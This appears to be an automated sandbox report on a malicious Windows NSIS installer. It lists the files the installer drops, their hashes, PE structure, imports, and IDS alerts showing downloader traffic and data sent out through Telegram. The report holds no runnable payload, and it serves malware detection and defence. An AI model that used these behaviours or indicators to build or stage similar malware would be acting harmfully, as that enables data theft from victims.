SHA-512:	B4784A1754ABE449C17A5B88E2D4ECA4D0B9A80E5A20416B80CAAF8989FAB9A6BABCD711691D91246C9B1F12BA7C01FD00450AF247AB4E4B64174E79466636D9
Malicious:	false
Preview:	huskers kvierne workingman.maanedsmagasinerne patriotical torpederinger baromacrometer tubful synchronousness logeion syvendelenes cadere spasmolysis..djvlekultens conscripting nebulium snary streamerbaand balfaldaras nonbeatific unwitless diplomate..ressagernes indifferensen inositols saltningen flimsiness.fusioneringen papists taknemlighedglds transpirering,lkagernes frokostmders farthingdeal.

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	789552
Entropy (8bit):	7.955898424452735
Encrypted:	false
SSDEEP:	12288:6DGZKmormA1VThZChbBUsfycFOzZ85VEuC4pJBFN167jo0WrAvgCTBIK4nzDiV:4mor/1xhZChlVfyPOJC4pzFTIMLrq8O
MD5:	831A8A58088361D324C958970B8ED79C
SHA1:	13366BEFE0AF1EBB0665C81209DCAB3388257CF0
SHA-256:	88A5FA91E12BE14E5E37A237DA70392DD9218F29AD88FA2CFF8693AB4E215E81
SHA-512:	A52F7D06CC421CFB6450C9C747C27B30342FA74EB9809B38BE22191A999985FE248EE600490C37E7D291E2ADDC71F8A922033ED934EE762DFDA6012C1F1C531A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P..s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.......3............@..................................9....@......................................................... ................................................................................................text...^a.......b.................. ..`.rdata..p............f..............@..@.data...X............z..............@....ndata...@...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\salpen.zoo

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	data
Category:	dropped
Size (bytes):	5161744
Entropy (8bit):	0.15808018941602964
Encrypted:	false
SSDEEP:	768:T+W5rfWR61urINGFhHyjTYYfH8tfhDPzQnR64u4EMMHPdu6izJlM/j2ZGoDuTmnj:moVSf
MD5:	862F3B806ED8EE61690B5CB807E4039F
SHA1:	63579479347755219148DB8926C9FAE8FF3456A4
SHA-256:	B8664ACCEAFF8EDC30B830CCEE20BF79BAC7D003169E8BD7A4C7FB025BBC83A7
SHA-512:	64B1617EB008A3496732D5737F2602F47796B6342DE64498BB93E1A3D94487FA1167DD008400FD19C46DF013FD6C211420AF4C33A9BAC3E15D13C5BE5984430B
Malicious:	false
Preview:	..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e.....................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Septomaxillary.Ali

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	data
Category:	dropped
Size (bytes):	342113
Entropy (8bit):	7.624220977626349
Encrypted:	false
SSDEEP:	6144:0zT5SVPysGciOPcyrda3NTzdv1AroxPhOTP6fZmgnkf0zdVCttlcgB:0zVSlYOUMa3NTzdv1AroxQMZU03CmgB
MD5:	9B013D587817D4C397B180ADC2BDA56B
SHA1:	9C5DE096F004A8DB3AB5A6731BDB96F4E3881DC1
SHA-256:	284DD260B9FD9141E8F787C720E453278B1BB8DFF1A655E158A16264B3EA7996
SHA-512:	19DEC58786E694C613B7EE237B2D983727750201EFDEA0D0988E88F1C53B4EE95C6DE27DAF824C7CC5BB972EED504D4F1D0B0E2E121842B4EA2160C8959CF9ED
Malicious:	false
Preview:	.............................W...............^^...............8.....AA....t..E...88.1........KKKK.............""..<.VVV...........]..........}}..................Q.**.....7............................................gg.x...........................1............X.nnnnnnn.....k........z....BB......xxx...........GGGG...ddd.................NN..j.......jj........................\\.............777...F...FFFFF.........````....88..............kkkk.......@@.CC..........@.......``.................2...;........N..t..???.....B....................................................K............oo............>>>.$$..............................f.......................................I.q....]]........................q...............===...........LL........\|.##.WW.........z.222............................................./..v...........OO........................V.G.........@.oo........................................b.......}}..........d..........................{.......\|........./..............Q.vv.....

C:\Windows\Resources\unthick.ini

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.187889194919351
Encrypted:	false
SSDEEP:	3:bovixgS7v4M2L:TgS7gZL
MD5:	E23F52386361095BDB7040B09E2216AE
SHA1:	91F31DD82AB80140DB621B6DCE0B9B5D6B568723
SHA-256:	36467321184A76E0FEA592D2896856A37EC18FC8480DE66F05D719D93B39D070
SHA-512:	19D18DE54B3466F0D283271786B3B308C3BE07F21174C46563C4C16292716C52F2C1B85F416ED77143EA6847BFC4C4C37F22296948EAC47499276B181F129B9C
Malicious:	false
Preview:	[gap]..predespond=fascinatingly..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.955898424452735
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	r5yYt97sfB.exe
File size:	789'552 bytes
MD5:	831a8a58088361d324c958970b8ed79c
SHA1:	13366befe0af1ebb0665c81209dcab3388257cf0
SHA256:	88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81
SHA512:	a52f7d06cc421cfb6450c9c747c27b30342fa74eb9809b38be22191a999985fe248ee600490c37e7d291e2addc71f8a922033ed934ee762dfda6012c1f1c531a
SSDEEP:	12288:6DGZKmormA1VThZChbBUsfycFOzZ85VEuC4pJBFN167jo0WrAvgCTBIK4nzDiV:4mor/1xhZChlVfyPOJC4pzFTIMLrq8O
TLSH:	9EF422682799CC73C5719AB0D8261FFADA365EA3D93CC75B66103C5E30363834A2D7A1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....

File Icon


Icon Hash:	070b4d61782c178f

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7192d3773f389d45ebac3cc67d054a8a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Monotony, E=Grosbeak@Tryglerierne10.Bru, O=Monotony, L=Regoul, OU="Skrivelser Hindring ", S=Scotland, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	17/08/2024 05:50:42 17/08/2025 05:50:42
Subject Chain	CN=Monotony, E=Grosbeak@Tryglerierne10.Bru, O=Monotony, L=Regoul, OU="Skrivelser Hindring ", S=Scotland, C=GB
Version:	3
Thumbprint MD5:	CB69F52AF42E1C4B70D0C8F8F90169F5
Thumbprint SHA-1:	22D29C53193D917BBDFC7BE6A75253480C50256F
Thumbprint SHA-256:	3E0CFEBDEAA4F6F4022C548F42E640595E85CADDAE8DC4CE018663F463F5B5D2
Serial:	0410CCB3C63FA71DD0DB1D82B6E33161347CBE41

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A230h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007F0C0CD8B3E3h
push ebp
call 00007F0C0CD8E53Eh
cmp eax, ebp
je 00007F0C0CD8B3D9h
push 00000C00h
call eax
push ebx
push edi
push 0040A3B0h
call 00007F0C0CD8E4BBh
push 0040A3A8h
call 00007F0C0CD8E4B1h
push 0040A39Ch
call 00007F0C0CD8E4A7h
push 00000009h
call 00007F0C0CD8E50Ch
push 00000007h
call 00007F0C0CD8E505h
mov dword ptr [0042A264h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [0042A318h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00421708h
call dword ptr [0040818Ch]
push 0040A384h
push 00429260h
call 00007F0C0CD8E0F2h
call dword ptr [004080ACh]
mov ebx, 00435000h
push eax
push ebx
call 00007F0C0CD8E0E0h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84bc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0x1c5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc0520	0x710
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615e	0x6200	41c79e199a2175acbe73d4712982d296	False	0.6625876913265306	data	6.4557374109402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1370	0x1400	9cbedf8ff452ddf88e3b9cf6f80372a9	False	0.4404296875	data	5.102148788391081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	73e3da5d6c2dd1bec8a02d238a90e209	False	0.5149739583333334	data	4.09485328769633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x24000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0x1c5c8	0x1c600	0e60bf3ace34d6a7de54772dad04b786	False	0.8734684746696035	data	7.577852317524115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f418	0xc9c0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9973280669144982
RT_ICON	0x5bdd8	0x5d9c	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9926556501418795
RT_ICON	0x61b78	0x2e8e	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States	0.9979023326061419
RT_ICON	0x64a08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4182572614107884
RT_ICON	0x66fb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.45075046904315197
RT_ICON	0x68058	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.6625799573560768
RT_ICON	0x68f00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.7382671480144405
RT_ICON	0x697a8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.6317073170731707
RT_ICON	0x69e10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.5505780346820809
RT_ICON	0x6a378	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_ICON	0x6a7e0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7002688172043011
RT_ICON	0x6aac8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8074324324324325
RT_DIALOG	0x6abf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6acf0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6ae10	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6aed8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6af38	0xae	data	English	United States	0.6379310344827587
RT_VERSION	0x6afe8	0x29c	data	English	United States	0.5089820359281437
RT_MANIFEST	0x6b288	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T17:17:26.605893+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	59370	216.58.206.46	443	TCP
2025-01-10T17:17:31.679110+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	59372	132.226.8.169	80	TCP
2025-01-10T17:17:32.976159+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	59372	132.226.8.169	80	TCP
2025-01-10T17:17:33.553402+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	59374	104.21.80.1	443	TCP
2025-01-10T17:17:34.444924+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	59375	132.226.8.169	80	TCP
2025-01-10T17:17:36.573806+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	59378	104.21.80.1	443	TCP
2025-01-10T17:17:40.018419+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	59382	104.21.80.1	443	TCP
2025-01-10T17:17:42.933167+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	59386	104.21.80.1	443	TCP
2025-01-10T17:17:45.508646+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	59389	149.154.167.220	443	TCP
2025-01-10T17:17:52.314903+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	59390	149.154.167.220	443	TCP
2025-01-10T17:17:54.940923+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	59391	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 17:15:54.951447964 CET	59308	53	192.168.2.7	162.159.36.2
Jan 10, 2025 17:15:54.956250906 CET	53	59308	162.159.36.2	192.168.2.7
Jan 10, 2025 17:15:54.956307888 CET	59308	53	192.168.2.7	162.159.36.2
Jan 10, 2025 17:15:54.961558104 CET	53	59308	162.159.36.2	192.168.2.7
Jan 10, 2025 17:15:55.409893990 CET	59308	53	192.168.2.7	162.159.36.2
Jan 10, 2025 17:15:55.415460110 CET	53	59308	162.159.36.2	192.168.2.7
Jan 10, 2025 17:15:55.415580034 CET	59308	53	192.168.2.7	162.159.36.2
Jan 10, 2025 17:17:25.523911953 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:25.523938894 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:25.524055004 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:25.545586109 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:25.545604944 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.191349030 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.191478968 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.192442894 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.192528009 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.278392076 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.278413057 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.278994083 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.281059980 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.283799887 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.327346087 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.605890036 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.606046915 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.606065035 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.606139898 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.606265068 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.606292009 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.606419086 CET	443	59370	216.58.206.46	192.168.2.7
Jan 10, 2025 17:17:26.606487989 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.606504917 CET	59370	443	192.168.2.7	216.58.206.46
Jan 10, 2025 17:17:26.631350040 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:26.631407022 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:26.631493092 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:26.631886959 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:26.631901979 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:27.270313025 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:27.270487070 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:27.288140059 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:27.288153887 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:27.288502932 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:27.288583994 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:27.288945913 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:27.331330061 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.571652889 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.571805954 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.577958107 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.578088999 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.590398073 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.590667963 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.590697050 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.590759039 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.596828938 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.596899033 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.658370972 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.658448935 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.658525944 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.658557892 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.658574104 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.658607006 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.661046982 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.661103964 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.661123037 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.661166906 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.667258024 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.667330027 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.667371988 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.667422056 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.673559904 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.673648119 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.673675060 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.673722982 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.679953098 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.680012941 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.680044889 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.680092096 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.686317921 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.686383963 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.686409950 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.686465979 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.692488909 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.692560911 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.692578077 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.692632914 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.698985100 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.699055910 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.699084044 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.699131012 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.704690933 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.704751015 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.704768896 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.704814911 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.710465908 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.710525990 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.710547924 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.710592031 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.716242075 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.716309071 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.716336012 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.716379881 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.722062111 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.722125053 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.722138882 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.722186089 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.727843046 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.727900982 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.745151043 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.745237112 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.745239973 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.745275021 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.745318890 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.745402098 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.745402098 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.745402098 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.745414019 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.745457888 CET	59371	443	192.168.2.7	142.250.186.129
